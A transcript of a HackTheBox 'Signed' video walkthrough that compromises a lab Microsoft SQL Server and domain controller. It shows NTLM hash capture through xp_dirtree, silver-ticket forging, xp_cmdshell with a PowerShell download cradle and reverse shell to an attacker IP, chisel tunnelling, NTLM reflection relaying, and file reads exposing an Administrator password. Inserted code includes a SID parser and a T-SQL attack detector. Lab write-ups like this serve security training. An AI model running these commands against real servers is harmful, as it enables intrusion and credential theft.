HackTheBox - Signed
Skills: Network Security 80%
Key Takeaways
Exploits Microsoft SQL Server using nmap, XP_DIRTREE, and SUSER_SID to enumerate users and escalate privileges
Full Transcript
What's going on YouTube? This is IppSec doing Signed from HackTheBox, which is a really cool assumed breach box that focuses on Microsoft SQL. The intended path was to use xp_dirtree to steal the NTLM hash of the service account running Microsoft SQL, forge a silver ticket, enable xp_cmdshell, and abuse a now-patched NTLM reflection technique to escalate to root. That's cool. But Microsoft SQL in general is a very tough service to secure, which leads to a lot of unintended paths here. If we forge the silver ticket correctly, we can abuse a SQL command that lets us read files as the system account. And this is how I think many people solve the box. They just read root.txt, put it in the website, and consider it a day. However, there's a very old method to steal the initial token of your process via named pipes, which still has the SeImpersonatePrivilege. So we'll get a shell with xp_cmdshell, do some trickery with named pipes, restore the SeImpersonatePrivilege, and that lets us use one of the many potatoes to priv. So with that being said, let's just get to exploiting some Microsoft SQL. As always, we're going to start off with an nmap. So -sC for default scripts, -sV to enumerate versions, -vv for double verbose; this gives us things like the TTL. -oA to output all formats in the nmap directory and call it signed. And then the IP address of 10.10.11.90. This can take some time to run, so I've already run it. Looking at the results, we have just one port open, and that is the Microsoft SQL Server on 1433. And the banner tells us it's Microsoft SQL Server 2022. Now the scripts failed to run, so we're not really getting any information; that's the ms-sql-ntlm-info and just ms-sql-info. And then also the SSL certificate is just self-signed, so we're not getting any type of host name or anything like that. So nmap really doesn't tell us anything at all. Now this box is an assumed breach, so that means we start off with a set of credentials.
The username is Scott and this is the password. And I also created a file called credentials.txt that also has this in it, but I'm going to start this off with just using impacket's Microsoft SQL client, mssqlclient.py. There we go. And then we're going to do scott, colon, the password, at 10.10.11.90. And that password has some special characters in it, so I'm going to wrap this in single quotes just so bash doesn't do anything funky. And we get logged in. Now we're Scott, and it says we are the guest user. So if we're guest, we probably have very limited commands, right? Right. If I do a help, I can see what commands my impacket MSSQL shell gives me. And it does have things like enable_xp_cmdshell. But since we're guest, I'm going to go off and say this isn't going to work. See, we don't have permissions. So we can't even do xp_cmdshell to run a command. If you don't know what this is, it would just start a command prompt and run the command. Really handy for getting like a reverse shell and escaping the SQL server. But what I'm going to do next is, let's see, we're going to do enum_db to see what databases there are. I'm looking for any custom database, like a web one, that may have a database of users where I could grab a password hash and crack it. But this just has all default databases. So nothing really here. If we look at other commands, we could do like enum_links to see if this server is linked to another one where we could jump to and do anything. Nothing there. enum_impersonate is going to give us nothing. We could try like enum_logins. We have sa and Scott, and Scott is not disabled, not an admin of anything. So it's just a basic user. What other things did we have? We had enum_users and this tells us four users. There's other ways we can get extra users which we'll show later in the video. But for now, nothing really sticks out from what commands we can do. If we do enum_owner, sa owns all the databases.
So let's see, is there anything else here? I don't think so. So what else we could do is maybe like a SELECT @@SERVERNAME, and that's going to get us DC01. So at least we know the host name of the box now. So I'm going to add that to my hosts file. So sudo vi /etc/hosts, and we could say 10.10.11.90 is DC01. What else could we really do? We could try like xp_dirtree. We're not really getting anything, but it's not erroring. We could see if it connects back to us. So I'm going to do nc -lvnp 445. We'll do that with sudo. Run this again. We can say \\10.10.14.8\doesnotmatter. This is just the share. And we see it does connect to us. So what this means is we can make the SQL server, the account that's running this, connect back to us, and it does an SMB handshake. So we can most likely steal a credential here. So I'm going to do a sudo responder -I tun0. I think I may have it cached. We'll see if this works. Does not matter. It is skipping a previously captured hash. So let's see. I think it's /usr/share. Is it responder, responder, Responder.db? So I'm just going to delete that. So we have it. Let's do a sudo. Rerun this. And now we'll get the hash. This is just because I had solved the box before and I forgot to clear that file. But we can grab this hash, and then I'm going to go over to Kraken, which is just a box I have on my network that I like running hashcat from. You can run it from anywhere. I don't recommend within VMs because hashing, uh, cracking passwords is very CPU intensive, and if you do a VM it'll go pretty slow. So I'm going to call this signed.ntlmv2 because that's what type of hash it is. Paste it. Then ./hashcat, this, /opt/wordlists/rockyou.txt, and it should just autodetect this hash and start cracking it right away. And almost immediately it cracks it and we get the password. Okay. So I'm going to exit this to get out of hashcat.
We're going to go vi creds.txt, and mssqlsvc is the username. I called it credentials. There we go. mssqlsvc. Put that there. And now let's go back on the box and we can try logging in. So mssqlsvc and put in this password. There we go. It failed. There are two ways to authenticate to Microsoft SQL. You have local authentication and Windows authentication. The default in this shell is Windows auth is false. So I'm just going to add -windows-auth to test this. And there we go, we get logged in. We are still guest. So we can't really do anything. If we do enum_users, we get a couple more users, but really not too much here. Let's see, an enum_logins. We do get a few more, like NT AUTHORITY\SYSTEM, SQLWriter. This is a group, SIGNED\IT. And if we look at this second column, that is going to be, let's see, we have name, the type, disabled, sysadmin. So sa is a sysadmin, IT is a sysadmin, SQLWriter, Winmgmt, things like that are sysadmin, and that'll become important later on. But really not too much information here. And before we get into what we're actually supposed to do, there is one kind of important thing to understand, because it's going to help us later on. And that is going to be that you can enumerate users from Microsoft SQL. And I'm going to switch over to NetExec. So I'm going to do nxc mssql 10.10.11.90. The user is going to be, we'll do this from Scott because this doesn't have to be privileged. So we could do it from either user. I'm using Scott because it's the lower level account. So, you know, it doesn't have to be privileged. Do that. Let's see. Does it log in? It's thinking about it. I don't have a typo in the IP. Login failed. It says try local auth. So we'll try that. NetExec's default is Windows auth, I think. So that's why we had to specify that. But here, if we do -h, we have --rid-brute. So I'm going to run this command. And we may have to give it a max RID. I'm not sure.
I think the default would be like 4000. Let's see what happens. So we get Scott. It's going to log in and hopefully it starts dumping a bunch of users. It failed. Timeout. Let's do 2000. There we go. So here we go. We're dumping a lot of information, and we get a lot more users than the enum_users in the MSSQL shell gave us. And this piece isn't really that important. We do see the domain name is signed. So it's DC01.signed.htb most likely. But what is important is understanding how this works. Because in Microsoft SQL, if you ever get the password of the account that is running it, which we did through that xp_dirtree, getting the NTLM hash, cracking it, we can do something called the silver ticket attack. In order to do the silver ticket attack, we have to get information from the Microsoft SQL Server such as the SID. And the SID is pretty hard to get, or at least not intuitive. So if we go back to this shell, we can run the command SELECT SUSER_SID and then give it the name of an account that exists. I'm going to do administrator because administrator is always going to exist. And I'm also going to specify the domain. So we'll do signed\administrator and we get this. If you don't know how to get the domain, let's see, I want to say if we did SELECT DEFAULT_DOMAIN(), that's a command, right? Yeah, that's signed. So I'm doing this because we know this exists. And this will get us this number. This is just the SID in a different format. I want to say it's binary format, but this is relatively a pain to convert back. The best way I found is just looking at how NetExec does it. So if you do NetExec GitHub, let's see. And if you ask AI, AI is going to do it for you as well. But I find understanding the RID brute force is what kind of led me down this whole path of understanding how all this works. So that's why I'm showing it this way. What we did, we did a --rid-brute, was the command, right?
So I'm going to search for that and we see it's in this protocols directory. So let's see, I'm going to search max-rid because I want to see exactly where it is in the code that this is used. And just searching rid brute didn't tell me. But if I add, let's go with one of the arguments that this uses. There we go. protocols/mssql, rid brute. And this is going to tell me exactly how that works. We can probably close that. Make this a little bigger. We see it's going to do a SELECT DEFAULT_DOMAIN(). That's going to get us signed. We already showed that. Then it's doing SELECT SUSER_SID of the domain's Domain Admins. So NetExec by default is going to always check the Domain Admins. We did administrator; it really doesn't matter. And then they use this command, the SID command, and they give it all this. So let's go ahead and see where this is pulled from. So if I scroll up, we see SID is right here. It's part of impacket. So let's go back to a shell. I'm going to do, we'll do a new pane, python3. We will import that. And then I'm going to just grab this again real quick. I'm going to call this raw SID. raw_sid, I guess. Sure. Wonder if I should put that in bytes, or string is fine. Let's see. Okay. See how this is used. So we do SID(bytes.fromhex(...)). So we'll say sid. Oh, we don't want to do that. I'll say admin, because that's administrator's SID, is equal to bytes.fromhex(raw_sid). What is this? That does not feel right. Oh, we need to specify SID to convert. There we go. Okay, that is a SID object. And it has this formatCanonical. So we're going to add that. I should have called that admin_sid, but there we go. Now we have the human readable SID. So that's how we can grab it. We just do bytes.fromhex, give it this weird thing, and then .formatCanonical(). And that will get us this SID. And this is how the --rid-brute is working, right?
We can go down a little bit to see exactly how this works, but it's doing a SELECT SUSER_SNAME(SID_BINARY(...)) and then giving it this format. So we could try SELECT SUSER_SNAME, I think it was, and then, was it SID_BINARY? Next SID_BINARY, and then it does capital N. Paste this in. Close that out. And there we go. So this is going to be the domain SID, and then this is going to be the identifier, and all the RID brute force is going to do is change that number, and we can just increment it, right? I think the default Microsoft group starts at 500, so that's that. Once you create accounts, I want to say it's 1000 or 1100. 1000 is DC01. Let's see, is it 1100 where users start? There's DnsUpdateProxy, there's the Microsoft SQL service. So this is all the RID brute is doing, is really just going through and incrementing this and getting all the users, right? So why did I show this? Because this piece is going to be very, very important. I'm going to copy that real quick. So let's see, how do we want to do this? I'll create a new pane. I'm going to call this gen_ticket.sh. So we're going to do ticketer.py. This is going to be another impacket script. I'm just doing it in this to make it easier for you to see all the arguments, right? So to generate a silver ticket, we'll need the SPN. This is the service principal name. And it really doesn't matter; this could be anything we want it to be, at least I found in my testing. The default is probably going to be the username, then slash, the machine it's talking to or the machine it's for. So the Microsoft SQL service is probably going to be this. If your account's running as something different, that may be different, but the SPN does not really matter. So I'm just going to put my money where my mouth is and say doesnotmatter/this. But you need to have it. It's weird. Domain SID, that is going to be this. We need to add the -domain-sid. And then what do we have? The domain is going to be signed.htb.
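The SID conversion the video does through impacket's SID class and formatCanonical(), and the RID increment that --rid-brute performs, written out by hand as an added example (this is not code from the video, from impacket or from NetExec). The binary layout it parses is Microsoft's SID structure; the domain SID S-1-5-21-1111-2222-3333 and the hex string in the demo are constructed values, not the ones from the box.

```python
import struct

# Binary SID layout (Microsoft's SID structure):
#   byte 0      revision (always 1)
#   byte 1      number of sub-authorities
#   bytes 2..7  48-bit identifier authority, big-endian (5 = NT authority)
#   then        one little-endian uint32 per sub-authority; the last one of an
#               account SID is the RID that --rid-brute increments


def bytes_to_sid(raw: bytes) -> str:
    """Binary SID (what SUSER_SID() returns) -> canonical 'S-1-5-21-...' string."""
    if len(raw) < 8:
        raise ValueError("SID too short")
    revision, count = raw[0], raw[1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    if len(raw) != 8 + 4 * count:
        raise ValueError("SID length does not match sub-authority count")
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack(f"<{count}I", raw[8:])
    return "S-" + "-".join(str(x) for x in (revision, authority, *subs))


def sid_from_hex(hex_sid: str) -> str:
    """Accepts the hex mssqlclient prints for SUSER_SID(), with or without 0x."""
    s = hex_sid.strip()
    if s.lower().startswith("0x"):
        s = s[2:]
    return bytes_to_sid(bytes.fromhex(s))


def sid_to_bytes(sid: str) -> bytes:
    """Inverse of bytes_to_sid: canonical string -> binary SID."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError(f"not a canonical SID: {sid!r}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)])
            + authority.to_bytes(6, "big")
            + struct.pack(f"<{len(subs)}I", *subs))


def split_rid(sid: str):
    """Account SID -> (domain SID, RID). The RID is simply the last sub-authority."""
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)


def with_rid(domain_sid: str, rid: int) -> str:
    """Domain SID + RID -> the SID you would hand to SUSER_SNAME(SID_BINARY(N'...'))."""
    return f"{domain_sid}-{rid}"


if __name__ == "__main__":
    # Constructed sample: what SUSER_SID('SIGNED\administrator') might return for
    # a made-up domain SID S-1-5-21-1111-2222-3333 (administrator is always RID 500).
    sample_hex = "0x01050000000000051500000057040000ae080000050d0000f4010000"
    admin_sid = sid_from_hex(sample_hex)
    domain_sid, rid = split_rid(admin_sid)
    print(admin_sid, domain_sid, rid)
    # Round trip, then build the SID for a higher RID the way --rid-brute does.
    assert sid_to_bytes(admin_sid).hex() == sample_hex[2:]
    print(with_rid(domain_sid, 1105))
```

The same parser also handles well-known SIDs such as S-1-5-32-544 (BUILTIN\Administrators) or S-1-1-0, since they are just fewer sub-authorities under the same structure.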
And then we have to give it the NT hash. I don't think ticketer... let's see if it does it. Maybe it's changed. -nthash. So we have -aesKey, -nthash. Nope, it doesn't. It doesn't have an option for putting in a password. So we have to generate the NTLM hash for this manually. You could just Google it, but it's relatively simple to create an NTLM hash. It's just an MD4 sum. So I'm going to do echo -n, paste this in. Then we want to convert this to UTF-16LE because that is what like most Windows stuff is. Is that it? Does that matter? That looks like it is. So I don't think we even need that dash. Huh. Okay, that's fine. And then what do we have to do? We have to do an MD4 sum. I don't have it there. Maybe openssl md4. We can do the legacy provider, -provider legacy. There we go. So this is going to be the NTLM hash. And of course you can just go online and Google like plaintext to NTLM and get it that way. So there's the hash of it. And then we have to do groups. So since we're doing the silver ticket, this is going to be what's in the Kerberos ticket. We can say whatever we want. It's not going to go back to the domain controller to validate it. That's the whole point of a silver ticket. We just forge the ticket. So what I want to do is get the group of Domain Admins. So let's see. We can probably do a SELECT SUSER_SID signed.htb... we don't need .htb. Domain Admins. Right. There we go. Grab this. Go here. And let's see, how can I do this quickly? We'll do SID(bytes.fromhex(...)). Paste this in, .format... I'm going to attempt to pronounce that again. I screwed something up. Let's see. I forgot a parenthesis. That's going to crash. There we go. So this is the Domain Admins SID. So I'm going to add 512. I'm also going to give it Domain Users, which is 513. And then the user ID for administrator is always going to be 500. That's the RID of the account. We could also just show that, but it'll take a second to do.
So I'm just going to hand-wave that part and assume you just trust me. If not, then go back to what you saw. Add signed\administrator. Look at the SID and you'll see it ends in 500. So this is going to give me the ticket I want, right? Yeah. So let's just do bash gen_ticket. And there we go. We have an administrator ccache file. So let's do KRB5CCNAME=administrator.ccache mssqlclient.py -k for Kerberos 10.10.11.90. Is this it? Let's see. It's taking a while. That did not work. KRB5CCNAME. What did I screw up here? It attempted to authenticate, I think, and we don't want it to. KRB5CCNAME. I wonder if there is like that. No, that doesn't look right. Yeah. I see cache file not found. So it's definitely not that. Oh, wait. It's Kerberos. We can't use IP addresses. We have to use host names. I'm guessing we have to add the full name, which will be dc01.signed.htb. But we can test this real quick. Yeah, that doesn't seem to be working. Let's do sudo vi /etc/hosts. And then we can say signed.htb and dc01.signed.htb. So what's happening here is Kerberos is very, very, very picky. In the actual Kerberos ticket that we generated, we said this ticket is for dc01.signed.htb, essentially. So unless the rhost is set to that, it's not going to authenticate us. So there we go. Now we are SIGNED\administrator. So you can see we forged that, but we're still only guest. And the whole reason we are only guest, let's see, if we do enum_logins, this is going to show us all the logins, and at no point is administrator a sysadmin. We have SIGNED\IT, that is going to be sysadmin; that's what this second column is. So we want to be a part of that Windows group. So let's close out of this and then we want to go back here. We can say SIGNED\IT. Grab this. Go to this window. Get the SID. That's going to be 1105. So let's go back into my gen_ticket. I'm going to do -groups 1105. Save this. We will run it again.
And now when we connect, we're going to tell it we're a member of that IT group. And the SQL server is not going to validate it because, again, this is a silver ticket. And now we're dbo@master, which means we're now sysadmin. And we can do enable_xp_cmdshell. And there we go. We changed from zero to one. And now we should be able to do this. whoami. And there we go. We have finally got code execution. Now, I'm missing some things here right now that we're going to get into at the end of the video. But right now, I'm just showing the intended path all the way to the end. And then I'm going to show some other cool things we could do from this MSSQL shell if we played with our ticket a little bit more. So don't worry, we'll come back to this, but I want to show the intended way. So what I'm doing now is I'm going to create a www directory so I can easily just run commands on this. I want to get a reverse shell. So I'm going to copy /usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1 and call it shell.ps1. And you don't need to use a web cradle like I am to do this. We could just run the PowerShell raw, but I find the web cradle is very handy because it lets us change the file up without changing our SQL command. Also, it will tell us if AV is at play, because it'll make a request to a web server. Then, if we never get the shell after that, chances are we have a typo here or AV killed it. If we just tried to encode the script and run it all at once, we never know if it's running or not. So having that web request come out to us to tell us, hey, it ran, is a very, very good thing. So let's do this. So this should get me a reverse shell. What we have to do is echo -n 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.8:8000/shell.ps1")'. And let's see, I used those single quotes twice. So we'll change those to doubles. There we go. I'm going to do iconv -t UTF-16LE because it is Windows.
It loves being in that format. base64 -w0. That puts my whole string on one line. So I can easily just copy this. Let's do python3 -m http.server. I'm actually going to do that up here. We'll keep our shell at the bottom. Okay. rlwrap nc -lvnp 9001. If I can type, that would be great. And now we can do xp_cmdshell powershell -EncodedCommand. Paste in our base64. And let's see, 404 not found, because I'm not in the www directory. There we go. And we have a shell. Hit enter. And we get the prompt here. So the first thing I always run when I get a shell from a service is whoami /priv to see if we have that SeImpersonatePrivilege, and we don't. And the step here in order to do it is relatively tough. It's going to be a cross-protocol reflection attack that takes advantage of a cred marshalling bug. It was shown in the DarkCorp machine and I probably explain it better there. So check out that video if you want more. However, this was patched around a year and a half ago. So I don't want to spend too much time on it, and the other ways are so much cooler and have been known for at least like six years without being patched. I want to say, let's see, this is probably, I think, CVE-2025-33073. If you want to know more, let's see, loopy ticket. There should be a Synacktiv post about this, right? Let's see. Synacktiv. Yeah. So I would look at like this presentation, because I want to say this is it. Yeah, this is going to be it. And we need this eventually. So what we'll have to do is be able to create a DNS name, because we can essentially take over a name. I'll explain it as I go. That'll probably make the most sense, because first we have to be able to create a DNS name. Now, I could probably just do this through the PowerShell commands, but I want to do it all in my box because I'm going to set up a complex tunnel anyways. So let's go ahead and start that process. I'm going to copy /opt/chisel/chisel.exe over to www.
And then I also want to stand up chisel. So we'll do /opt/chisel/chisel. And the reason I'm doing this is because we don't have any of the SMB ports exposed. We just have MSSQL. So we're going to set up a proxy so we can access the ports related to Active Directory, and we can use the credentials we have to create an account. So we'll do server --reverse on port 9000 and we want to use SOCKS5. There we go. And now we can do cd \ProgramData. This is just a directory that I know I have read/write to. We can curl http://10.10.14.8:8000/chisel.exe -o chisel.exe. This should download, right? Yep, that is. So we can do .\chisel.exe client 10.10.14.8:9000, we did it on 9000, and we want to say R:socks. So here we have now set up the tunnel. So now we can do a sudo nc... we don't want to do sudo, we want to do proxychains nc 10.10.11.90 and then 445. I'm going to add -zv, lowercase v. We can see we can now connect. And if you can't, your proxychains config may not be set up correctly. We can look at it. I just have socks5 127.0.0.1 1080. If I look at chisel, we can see it is listening on 1080 for that SOCKS proxy. So now that we have this, let's see, we want to be able to add that DNS name. So I'm going to do, we have to get a tool. It's in the krbrelayx GitHub. And we'll also need to use krbrelayx as well. So this is a package we'll definitely need. So I'm going to do a git clone on this. And let's do python3 -m venv to create our virtual environment. There we go. Go in here. I know we need to install impacket. So I'm just going to go ahead and do that. It's starting the install. There we go. So I should now have a tool called dnstool, right? Yes. So let's do dnstool.py -u signed\mssqlsvc -p, that is purple. So we can go ahead and grab this, and then -a add, the record is going to be dc01. Then I want to go to this and grab this.
This is going to be the magic string that, essentially, when it gets passed to a cred marshalling service, this resolves to nothing and then it comes back to DC01. So what we do here essentially is we create this record, it points to us. So when someone queries that record, they get our IP address. However, when Kerberos is doing the validation, it goes through a cred marshall process, or unmarshall, I don't know exactly the terminology, but when it does that, this piece gets chopped off because it resolves to nothing and they're left with DC01. So whoever we're talking to thinks we're DC01, and that becomes handy because we get DC01 to make a request to us through this. We chop that piece off because of the cred marshalling. We reflect that request somewhere else. And now we can impersonate DC01. Again, check out the DarkCorp video if you want more of an explanation. So let's see. That record is going to point to 10.10.14.8, and the box's IP is 10.10.11.90. We will have to use proxychains. Let's see. No module named Crypto. pip3 install pycryptodome. Whenever I see a Crypto error in impacket, I always just go ahead and install the pycryptodome package. I think that's normally right. Yep, there we go. So we have added that record. So this host exists and it points to us. So now what we have to do is set up the NTLM relay. And I'm going to have to do this as root, because if you use sudo, it's going to break proxychains. And also if you just like give Python the capability to listen on port 445, it's also going to break proxychains. So it's always best here to switch to root. And then we can go back into our environment. Go into krbrelayx. We can say proxychains ntlm... Oh, do we have ntlmrelayx? Yeah, we do. So we can say proxychains. I'm not using krbrelayx. I'm using ntlmrelayx. And if I didn't go into this, my impacket is at impacket-ntlmrelayx as my root user. If I ran this, it is going to be version 11 from 2023.
And the feature we're using comes in impacket version 13. So that is why I'm just going to go to where I have impacket here, krbrelayx, and we can see now I'm running version 13 here. So we'll do ntlmrelayx. We can do proxychains. The target is going to be winrms. This is what was added in version 13. So 10.10.11.90. So what we're doing here is taking an NTLM connection and then reflecting it to this endpoint, which is going to be WinRM. And we also need to add -smb2support. There we go. And now we can use NetExec, I think, to coerce this. So proxychains nxc smb dc01.signed.htb, username mssqlsvc, yep that is right, -p, let's get that password again, grab that, paste, awesome. And then if I do -L, that's going to give me a list of modules I can use, and the module we want, let's see, is it... here we go, we want to use coerce_plus. So we can say -M coerce_plus. I want to say --options lets us see the options of a module. It does. So these are the module options we have. So what we'll want to use is -o for options, and we can say LISTENER= that's going to be that DC01 string we created. There we go. So what we're doing here is doing coerce_plus and we're telling it to connect to this host. And this is important because, again, when the server cred marshals it, it just has to be DC01 and this string will get chopped off. Again, I show that in DarkCorp, exactly what happens. Let's see, the method I'm going to use, PetitPotam, the first one. I think PrinterBug also works, maybe ShadowCoerce would work as well, but I know PetitPotam does. These are just ways to, like, force a service to make a request. So we're right now forcing the SYSTEM account of DC01 to make a request through the PetitPotam method, and it's going to make a request to this, which is going to resolve to us. So it's going to make a request over SMB 445. We're going to hit this NTLM relay here, and we're going to forward it over to WinRMS 5986 and then get a shell.
So let's run this. And if this doesn't work, maybe I have to create the domain name again, because it may have automatically gotten cleaned up, but we'll see. So it is now running that. It says it is vulnerable. Exploit success, but we don't have a shell. So I'm going to add that host name again because maybe something cleaned it up because I was too slow. Let's try running this again and hopefully it works. If not, I have a big issue somewhere. I have an issue. That's not good. It says it's vulnerable. Let's see. I'm going to copy this. We'll go. Let's see, where do I have a shell? I don't think I have a shell anymore because that's running chisel. So let's do nc -lvnp 9001. I'll probably kill this without killing my shell. Please run this again. Hopefully that comes back. Connect back. That's annoying. We'll copy this command. All I want to do is ping that weird domain name to make sure it resolves back to my box. Oh, it did connect eventually. There we go. So let's go back here. We did DC01 this. Where is that shell? What if I add signed.htb? Nope. So that is working. So we ping this. It added the signed.htb. It does go back to us. So is my ntlmrelayx command wrong? We do proxychains ntlmrelayx. Target is winrms. That looks good. That is the box. Do we have to give it the host name? I don't think so. Let's see. sudo tcpdump -i tun0 port 445, -n, don't do DNS. Oh, we're going to get hits because we're doing NetExec on 445 as well. Are there any other options for this? No, we'll just run it again. Okay, I just ran it again. I don't think I changed anything, but it magically worked when I was setting up to try to debug. We can see right here we got some output: winrms started an interactive winrms shell on this socket, 127.0.0.1 on port 11000. So let's do nc 127.0.0.1 11000. And if I do whoami, we're NT AUTHORITY\SYSTEM. So we can do cd Users\Administrator\Desktop, and then Users\Administrator... or is this shell just stupid?
I think that shell is just really stupid and doesn't have like command history; the change directory is not working. But that is one way to do the box. So I guess the lesson is, like, if the command doesn't work, just try it again. I'm not sure exactly what changed between attempts, but something did. However, there is a much cooler way to root this box. So that's what we're going to dig into now. And I'm just killing chisel and we're going to just get back to a clean slate. I can probably close all my windows and we'll get back. Let's see. We don't need this. I definitely want to keep that. Having that SID thing is definitely handy. So okay, let's look at that gen_ticket command again real quick. So we're doing the SPN, does not matter. We're giving it the domain SID, the domain, the password hash of the service account that is running Microsoft SQL, and we need that because that's what's signing these tickets, right? We got Domain Admins, Domain Users, and this is SIGNED\IT, the RID of administrator, and administrator. So if we run this, we can do that. And then let's see, mssqlclient with KRB5CCNAME. That should be fine, right? That gets us a shell. So there is a command SELECT * FROM OPENROWSET. And this is going to read files on the box, right? So we could do C:\Users, let's see, mssqlsvc\Desktop\user.txt. I think that's where this is. If you go to like a Microsoft SQL cheat sheet, this is a common way to read files. Either impersonation was not valid... Let's see. C:\, is it Windows\System32\license.rtf? So something is wrong with this. I was actually expecting to be able to read this file, but maybe I can't. Let's go ahead and copy that. Exit. Actually we need to get one more RID. SELECT SUSER_SID mssqlsvc. It's this, copy, paste. There we go. 1103 is the SID for the Microsoft SQL Server. So let's go ahead and become that user.
So vi gen_ticket, user ID is going to be 1103, and I'm going to call this mssqlsvc. Okay, this gets in. So now let's just go ahead and copy this as contents. Okay, now we can read that file. So since we're impersonating the mssqlsvc account and not administrator, it's going to let us become whatever process it's using to run Microsoft SQL. It's weird that it works this way, right? But now we should be able to do C:\Users\mssqlsvc\Desktop. I think user.txt is here, right? Yeah. And we can also do C:\Users\Administrator\user.txt. That's going to actually be root.txt, and get that. So we can get both those hashes. Now I know what you're thinking. If we do xp_cmdshell, we should be the administrator user because we're reading their files, right? We do whoami, we are not. If we do whoami /all, we still only have those four privileges. We don't have a way to impersonate. If we got a shell and tried to go into Administrator, we can't, because the way it's starting a process is killing the way we impersonate to become administrator when we run this command. Essentially the parent process is a local service or local system, I'm guessing, that can read this file. However, whenever it does a process start, it downgrades us to the user that is running it, and we lose a lot of our permissions. I'm going to show how to get the impersonation back at the very end of this video. But another file we could read that is interesting would be Administrator and then, what is it, AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt. Please say yes, that is. And this is the PowerShell console history. So I'm going to copy all of this. I want to say if I just do a printf, it'll work.
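Everything the box has been attacked with so far goes through T-SQL the server can log: xp_dirtree pointed at a UNC path (the NTLMv2 capture), sp_configure flipping xp_cmdshell on and then running it, OPENROWSET(BULK) reading files off the host, and the SUSER_SNAME(SID_BINARY()) loop behind --rid-brute. As an added example from the defender's side (not code from the video or from any tool it uses), here is a small detector over captured statements. It assumes the input is (login_name, statement_text) pairs, as you could export from a SQL Server Audit or an Extended Events session capturing batch and RPC completions with the client login; the sample statements, logins, SID and paths are constructed.

```python
import re
from collections import Counter

# Per-statement rules: (rule_name, compiled regex). Case-insensitive because
# T-SQL is, and N'...' literals are accepted alongside plain quotes.
RULES = [
    # xp_dirtree/xp_fileexist/xp_subdirs against \\host\share makes the SQL
    # service account authenticate outbound over SMB (the NTLMv2 capture step).
    ("xp_dirtree_unc",
     re.compile(r"xp_(?:dirtree|fileexist|subdirs)\s+N?'\\\\", re.I)),
    # sp_configure flipping xp_cmdshell from 0 to 1.
    ("xp_cmdshell_enabled",
     re.compile(r"sp_configure\s+N?'xp_cmdshell'\s*,\s*1\b", re.I)),
    # Actual OS command execution through xp_cmdshell (master.. / master.dbo. optional).
    ("xp_cmdshell_exec",
     re.compile(r"\bEXEC(?:UTE)?\s+(?:master\.(?:dbo\.|\.))?xp_cmdshell\b", re.I)),
    # OPENROWSET(BULK ...) reading files from the host filesystem.
    ("openrowset_bulk",
     re.compile(r"OPENROWSET\s*\(\s*BULK\b", re.I)),
]

# Resolving SIDs back to names in bulk is how RID cycling looks from the server side.
SID_LOOKUP = re.compile(r"SUSER_SNAME\s*\(\s*SID_BINARY\s*\(", re.I)
RID_CYCLING_THRESHOLD = 3  # lookups by one login before we call it out


def scan(statements, threshold=RID_CYCLING_THRESHOLD):
    """Return [(login, rule_name, detail)] for every rule hit.

    Per-statement rules fire in input order; the RID-cycling finding is
    appended once per login whose SID lookups reach the threshold."""
    findings = []
    lookups = Counter()
    for login, stmt in statements:
        for name, rx in RULES:
            if rx.search(stmt):
                findings.append((login, name, stmt))
        if SID_LOOKUP.search(stmt):
            lookups[login] += 1
    for login, n in lookups.items():
        if n >= threshold:
            findings.append((login, "rid_cycling",
                             f"{n} SUSER_SNAME(SID_BINARY()) lookups"))
    return findings


# Constructed sample statements; logins, the domain SID and the paths are made up.
SAMPLE_STATEMENTS = [
    ("scott", "SELECT name FROM sys.databases"),
    ("scott", r"EXEC master..xp_dirtree '\\10.10.14.8\share', 1, 1"),
    ("scott", "SELECT SUSER_SNAME(SID_BINARY(N'S-1-5-21-1111-2222-3333-1100'))"),
    ("scott", "SELECT SUSER_SNAME(SID_BINARY(N'S-1-5-21-1111-2222-3333-1101'))"),
    ("scott", "SELECT SUSER_SNAME(SID_BINARY(N'S-1-5-21-1111-2222-3333-1102'))"),
    ("SIGNED\\administrator", "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;"),
    ("SIGNED\\administrator", "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"),
    ("SIGNED\\administrator", "EXEC xp_cmdshell 'whoami /priv'"),
    ("SIGNED\\mssqlsvc",
     r"SELECT * FROM OPENROWSET(BULK 'C:\Users\Administrator\Desktop\root.txt', SINGLE_CLOB) AS f"),
]

if __name__ == "__main__":
    for login, rule, detail in scan(SAMPLE_STATEMENTS):
        print(f"{rule:20} {login:22} {detail}")
```

The "show advanced options" line is deliberately not flagged on its own; it is the xp_cmdshell change right after it that matters, and the enable and the execution are reported as separate findings so a ticket can distinguish a one-off admin change from a login that both enabled the feature and used it.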
printf... maybe I should just copy the whole thing and put it in Python, because it's a bit of a pain since we have those \r and \n, right? But let's see, that is a binary string, so if we do python... just looking for a better way to view this. test is equal to that. test.decode(). That did not do it. I was hoping it would have done the \n's. The easiest way, I guess, would be just to use sed. And I know 0xdf is going to watch the video and find a better way to do it in Python, but oh well. Let's see, sed s like this, and I think I just do \n, right? There we go. That is better.

So these are going to be all the PowerShell commands. Let's see. We go through: they're installing the SQL Server, getting the service, any IP... there should be a password right there. There we go: Set-ADAccountPassword -Identity administrator -NewPassword, and it gives us the Administrator password. So then we could use this password with something like Chisel to get a shell as Administrator there. I wonder. Let's see, EXECUTE AS USER... help. I don't know how to run this command. I was wondering if that would enable us to, but no. If we still had Chisel running, which I don't because I killed it and I'm too lazy to start it back up, you could just use psexec with this password for Administrator and then get your shell.

I wonder... I don't think this is going to work, but I don't know. I can't imagine, because the silver ticket didn't work and we're doing pretty much the same thing. It doesn't hurt to try. Administrator, this, at that: not found. I wonder if I have to add signed\Administrator. Huh? I know this is the password. I thought it was. I'm fairly certain. Administrator. I may have to get Chisel on this box and double-check this before publishing the video. Yeah, that is definitely the password for the local account. I guess I don't want Windows auth. There we go. Okay. And we're guest on master.
